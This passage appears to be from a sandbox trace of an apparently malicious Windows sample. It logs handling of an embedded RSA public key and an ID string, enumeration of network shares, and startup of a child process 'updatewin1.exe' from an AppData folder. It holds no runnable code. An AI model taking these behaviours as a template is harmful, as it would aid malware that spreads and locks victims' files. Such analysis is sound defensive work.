lpString1="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0167.205] lstrcpyA (in: lpString1=0xfc2a778, lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.205] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.206] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.207] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x318ef40 [0167.207] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x854) returned 0x31b77d0 [0167.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318ef40, cbMultiByte=-1, lpWideCharStr=0x31b77d0, cchWideChar=1066 | out: lpWideCharStr="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 43 [0167.207] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x31b8030 [0167.207] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b77d0 | out: hHeap=0x260000) returned 1 [0167.207] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x318ef40 | out: hHeap=0x260000) returned 1 [0167.207] lstrcpyW (in: lpString1=0x521cf0, lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0167.207] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b8030 | out: hHeap=0x260000) returned 1 [0167.207] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0167.207] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x56) returned 0x31bd280 [0167.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc2a778, cbMultiByte=-1, lpWideCharStr=0x31bd280, cchWideChar=43 | out: lpWideCharStr="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 43 [0167.207] lstrcpyW (in: lpString1=0x521cf0, lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0167.207] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 495 [0167.207] lstrlenW (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 40 [0167.312] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31aad98 | out: hHeap=0x260000) returned 1 Thread: id = 78 os_tid = 0xb30 [0171.809] timeGetTime () returned 0x1155cd0 [0171.809] GetLastError () returned 0x54f [0171.809] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3bc) returned 0x9b02b68 [0171.809] GetCurrentThreadId () returned 0xb30 [0171.809] SetLastError (dwErrCode=0x54f) [0171.809] Sleep (dwMilliseconds=0x1adb0) Thread: id = 79 os_tid = 0xb2c [0171.809] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x9f1fee0 | out: lphEnum=0x9f1fee0*=0x31cae60) returned 0x0 [0175.525] WNetEnumResourceW (in: hEnum=0x31cae60, lpcCount=0x9f1fedc, lpBuffer=0x3231f80, lpBufferSize=0x9f1fed8 | out: lpcCount=0x9f1fedc, lpBuffer=0x3231f80, lpBufferSize=0x9f1fed8) returned 0x0 [0175.525] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac6c8 [0175.525] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac560 [0175.525] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x3214208 [0175.525] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac5a8 [0175.525] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac320 [0175.525] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3231f80, lphEnum=0x9f1fe28 | out: lphEnum=0x9f1fe28*=0x3182618) returned 0x0 [0175.720] WNetEnumResourceW (in: hEnum=0x3182618, lpcCount=0x9f1fe24, lpBuffer=0x9b07d78, lpBufferSize=0x9f1fe20 | out: lpcCount=0x9f1fe24, lpBuffer=0x9b07d78, lpBufferSize=0x9f1fe20) returned 0x103 [0175.720] WNetCloseEnum (hEnum=0x3182618) returned 0x0 [0175.720] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac560 | out: hHeap=0x260000) returned 1 [0175.720] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac6c8 | out: hHeap=0x260000) returned 1 [0175.720] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac6c8 [0175.720] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac560 [0175.720] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xe0) returned 0x3227168 [0175.720] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac1b8 [0175.720] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x3220fd0 [0175.720] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac320 | out: hHeap=0x260000) returned 1 [0175.720] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac5a8 | out: hHeap=0x260000) returned 1 [0175.720] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3214208 | out: hHeap=0x260000) returned 1 [0175.720] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac5a8 [0175.720] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac320 [0175.720] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3231fa0, lphEnum=0x9f1fe28) Thread: id = 80 os_tid = 0x34c Process: id = "7" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe" page_root = "0x1b2a1000" os_pid = "0xab4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xabc" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 81 os_tid = 0xa64 [0178.329] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9dd30fe0, dwHighDateTime=0x1d60e72)) [0178.329] GetCurrentProcessId () returned 0xab4 [0178.329] GetCurrentThreadId () returned 0xa64 [0178.329] GetTickCount () returned 0x11563e2 [0178.329] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=29833986965) returned 1 [0178.329] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0178.329] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x580000 [0178.332] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.333] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0178.333] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0178.333] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0178.333] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0178.333] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.333] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.335] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.335] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.336] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.336] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.336] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.336] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.336] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.337] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.337] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.337] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.337] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.338] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.338] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.339] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0178.339] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x214) returned 0x5807d0 [0178.340] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.340] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0178.340] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.340] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.340] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0178.341] GetCurrentThreadId () returned 0xa64 [0178.341] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0178.341] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x800) returned 0x5809f0 [0178.341] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0178.341] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0178.341] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0178.341] SetHandleCount (uNumber=0x20) returned 0x20 [0178.341] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe\" " [0178.342] GetEnvironmentStringsW () returned 0x5d4e70* [0178.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0178.342] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x565) returned 0x5811f8 [0178.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x5811f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0178.342] FreeEnvironmentStringsW (penv=0x5d4e70) returned 1 [0178.342] GetLastError () returned 0x0 [0178.342] SetLastError (dwErrCode=0x0) [0178.342] GetLastError () returned 0x0 [0178.342] SetLastError (dwErrCode=0x0) [0178.343] GetLastError () returned 0x0 [0178.343] SetLastError (dwErrCode=0x0) [0178.343] GetACP () returned 0x4e4 [0178.343] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x220) returned 0x581768 [0178.343] GetLastError () returned 0x0 [0178.343] SetLastError (dwErrCode=0x0) [0178.343] IsValidCodePage (CodePage=0x4e4) returned 1 [0178.343] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0178.343] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0178.343] GetLastError () returned 0x0 [0178.343] SetLastError (dwErrCode=0x0) [0178.343] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0178.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0178.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0178.344] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0178.344] GetLastError () returned 0x0 [0178.345] SetLastError (dwErrCode=0x0) [0178.345] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0178.345] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0178.345] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ榘沮㞕AĀ") returned 256 [0178.345] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ榘沮㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0178.345] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ榘沮㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0178.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 